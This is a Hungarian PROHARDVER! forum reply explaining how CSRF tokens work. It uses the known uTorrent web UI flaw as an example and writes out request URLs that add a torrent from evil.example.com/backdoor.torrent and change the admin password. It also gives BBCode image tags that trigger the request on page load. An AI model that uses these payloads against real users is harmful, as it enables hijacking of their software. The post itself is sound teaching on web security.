Hirdetés
- Milyen egeret válasszak?
- Milyen videókártyát?
- Milyen alaplapot vegyek?
- Projektor topic
- Itt a Valve GŐZGÉP — Steam Machine, mi vagy te? 🧐
- NVIDIA GeForce RTX 5070 / 5070 Ti (GB205 / 203)
- Stratégiai biztonsággal védekeznek a dráguló memóriák ellen a gyártók
- Apple MacBook
- Melyik tápegységet vegyem?
- AMD K6-III, és minden ami RETRO - Oldschool tuning
-
PROHARDVER!

Új hozzászólás Aktív témák
-
válasz
bandi0000
#12731
üzenetére
A CSRF védelem lényege, hogy minden hívásnál random (vagy csak nagyon rövid ideig - egy oldal életciklusáig - él). A tokent nem cookie-ban vagy más lokális store-ban tároljuk, hanem a lap kódjában kerül eltárolásban (legtöbbször hidden form field-ben, mert lekérésnél vissza kell adni a szervernek). A védelem lényege az, hogy a felhasználó nevében nem lehet olyan kérést indítani, aminek a "forrása" nem a kérdéses weboldal.
Illetve a fenti megoldás a "secure" mód - de ez elcseszi a vissza-gomb működését ("CSRF Failure"-t hibát generál), legtöbbször - alacsonyabb biztonsági szinthez, session-élettartamú CSRF-tokent generálnak.
Ennek a védelemnek egyébként az a feltétele, hogy atámadó ne tudja megszerezni a session/csrf token-t (azaz ne legyen az alkalmazásban XSS sebezhetőség - vagy az alkalmazás csrf token segítségével ezonosítsa a felhasználót ne csak session cookie és/vagy kliens ip alapján).
Jó példa erre (wikiből) az alábbi uTorrent sebezhetőség:
Torrent letöltés hozzáadása:
http://localhost:8080/gui/?action=add-url&s=http://evil.example.com/backdoor.torrent
uTorrent administrator password megváltoztatása
http://localhost:8080/gui/?action=setsetting&s=webui.password&v=eviladminCSRF támadó kód simán kivitelezhető pl egy IMG tag hozzáadásával, ami a sebezhető címre mutat (BBCode):
[img]http://localhost:8080/gui/?action=add-url&s=http://evil.example.com/backdoor.torrent[/img]
vagy ide a PH-ra:[IMG:http://localhost:8080/gui/?action=add-url&s=http://evil.example.com/backdoor.torrent][/IMG]
Új hozzászólás Aktív témák
● olvasd el a téma összefoglalót!
- 1TB Samsung 3,5"-os HDD-k (ár és állapot infók a leírásban)
- Olcsó laptop! Lenovo Ideapad 1 15AMN7! AMD 7120U / 4GB / 128 SSD
- Bontatlan Steam Deck 512GB OLED + Dokkoló + 512 GB memóriakártya
- 1TB-os Western Digital 3,5-es HDD-k (állapot infók és árak a leírásban)
- Apple watch SE3 2025 cellular eladó! Garanciával gyári dobozban
- Xiaomi Poco M7 Pro 256,Újszerű,Dobozával,12 hónap garanciával
- Fém, összecsukható és kihúzható fotó állvány eladó
- GYÖNYÖRŰ iPhone 14 Pro Max 256GB Space Black - 1 ÉV GARANCIA, Kártyafüggetlen,MS3489, 100% Akksi
- CTO Bontott 0perces TÜZES EZÜST MacBook Air 13.6" M4 10C/1G 16GB 512GB Gar.: 1 év APPLE világgar
- Bomba ár! HP EliteBook 820 G2 - i5-5GEN I 8GB I 256GB SSD I 12,5" FHD I Cam I W10 I Garancia!
Állásajánlatok
Cég: ATW Internet Kft.
Város: Budapest
Cég: BroadBit Hungary Kft.
Város: Budakeszi



